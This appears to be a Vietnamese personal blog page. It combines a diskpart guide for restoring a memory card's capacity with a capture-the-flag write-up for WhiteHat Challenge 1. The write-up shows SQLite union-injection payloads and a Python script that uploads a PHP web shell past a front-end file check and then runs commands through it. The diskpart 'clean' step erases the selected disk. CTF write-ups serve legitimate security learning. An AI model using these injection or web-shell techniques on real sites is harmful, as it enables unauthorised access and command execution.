Bảo vệ: Hacknote (pwnable.tw) – Mình tên là verynoob

Nội dung này được bảo mật. Hãy nhập mật khẩu để xem tiếp:

Advertisements

Khôi phục thẻ nhớ bị mất dung lượng

Bước 1: vào chạy cmd dưới quyền admin và gõ:

> diskpart (bật chương trình diskpart)

Bước 2:

> list disk 

(xem các disk trong máy, tìm disk của USB hoặc thẻ nhớ)
Bước 3:

> select disk x

(với x là tên disk của USB hoặc thẻ nhớ được list trong Bước 2)
Bước 4: delete vùng nhớ và gộp nó lại

> clean

Bước 5: tạo lại 1 ổ đĩa cho thẻ nhớ

> create partition primary

Bước 6: xem các vùng nhớ

> list partition

Bước 7: chọn vùng nhớ nãy tạo

> select partition x

(với x là tên partition vừa tạo)
Bước 8: Format vùng nhớ lại

> format fs=NTFS quick

Chờ vài phút là xong

WhiteHat Challenge 1

Giải này khá là ez nên mình cũng không muốn chém gió nhiều.
1. Misc 01 (25)
– bypass backslash trong SQLite, thực ra cái SQLite này không có chức năng backslash (ý tưởng giống tower2 SVATTT 2016)

joker@Kiva:~$ nc 103.237.98.32 3737
< Inject me if you can >
         --------------------
         \   ^__^
          \  (oo)\_______
             (__)\       )\/\
                 ||----w |
                 ||     ||

input name to check pass, ex:linh, trang...:  
' union select sql from sqlite_master-- -
password:  (u'CREATE TABLE mbbg(name varchar(128),pwd varchar(128))',)
input name to check pass, ex:linh, trang...:  
' union select pwd from mbbg-- -
password:  (u'whatissqlite',)
input name to check pass, ex:linh, trang...:  

2. web 01 (15)
-Chỉ đơn giản là làm 1 con shell và post lên nhưng không dùng browser vì nó check front-end

import requests

folder_uploaded = "resources/"
path_upload = 'upload_controllers.php'
url = 'http://lab11.wargame.whitehat.vn/4d070da310a6b3bea7f538dd5d265cea/'
proxy = {"http":"http://127.0.0.1:8080"}
name_post = 'input-image'
shell_name = '5cv2rf73dtg2jlup5bo2nnc1q6_1488008497_c735bca142e9759b6f1b0b2401039f52.php'
mime_type = 'image/png'
malicious = '<?php system($_POST["a"])?>'


def pwn(folder_uploaded,path_upload,url,proxy,name_post,shell_name,mime_type,malicious,debug=False):
	payload = [(name_post, (shell_name,malicious,mime_type))]
	s = requests.Session()
	if debug == False:
		s.get(url)
		s.post(url+path_upload,files=payload,data={"submit":"Upload"})
	else:
		s.get(url,proxies=proxy)
		s.post(url+path_upload,files=payload, verify=False, proxies=proxy,data={"submit":"Upload"})		
	filename = url+folder_uploaded+shell_name

	while 1:
		cmd = raw_input("$ ")
		if cmd=="exit":
			break
		shell = s.post(filename,data={"a":cmd}).text
		print shell


pwn(folder_uploaded,path_upload,url,proxy,name_post,shell_name,mime_type,malicious)

1

2

ez 2 flag